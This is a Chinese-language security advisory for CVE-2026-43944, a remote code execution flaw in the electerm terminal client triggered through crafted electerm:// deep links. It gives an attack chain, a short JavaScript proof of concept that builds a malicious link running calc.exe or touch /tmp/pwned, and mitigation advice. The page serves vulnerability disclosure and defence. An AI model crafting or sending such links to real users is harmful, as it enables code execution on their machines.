CVE-2026-43944 electerm任意代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-43944

漏洞类型

远程代码执行

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

electerm

漏洞概述

electerm是一款开源终端/SSH客户端。在3.0.6至3.8.15之前的版本中，存在任意本地代码执行漏洞。攻击者可通过诱导用户点击特制的electerm://深链接或打开包含恶意参数的快捷方式，触发漏洞并在受害者系统上执行任意代码。

技术细节

该漏洞由于electerm在处理自定义协议链接（electerm://）及命令行参数（--opts）时，缺乏对输入参数的严格校验与隔离。攻击者可构造包含恶意命令参数的URL或快捷方式。当用户点击链接或启动快捷方式时，electerm会将攻击者控制的参数直接传递给底层执行环境，从而绕过安全限制，导致任意本地代码执行。

攻击链分析

STEP 1

1. 制作攻击载荷

攻击者构造包含恶意命令的electerm://深链接或CLI参数。

STEP 2

2. 投递载荷

通过邮件、网页或即时通讯工具将恶意链接发送给目标用户。

STEP 3

3. 诱导交互

诱导用户点击恶意链接或打开伪造的快捷方式文件。

STEP 4

4. 触发漏洞

electerm解析传入的参数，由于未正确过滤，将其作为系统命令执行。

STEP 5

5. 获取权限

攻击者在用户主机上下文中执行任意代码，控制受影响系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-43944: Arbitrary Code Execution via Deep Link
// This demonstrates how a malicious link can trigger command execution.

// On Windows, this would attempt to launch calculator
let payload = 'calc.exe'; 

// On Linux/macOS, this would attempt to create a file
// let payload = 'touch /tmp/pwned';

// Construct the malicious electerm deep link
// The application parses the URI and passes arguments insecurely
let exploitUrl = `electerm://--opts={"run":"${payload}"}`;

console.log("Exploit Link:", exploitUrl);
// To test: Host this link or send via chat, click while electerm is installed.

影响范围

electerm 3.0.6 至 3.8.15 之前的版本

防御指南

临时缓解措施

若无法立即升级，建议暂时取消 electerm 默认协议处理程序的关联（在操作系统设置中修改），并提高警惕，避免从不可信来源接收启动参数。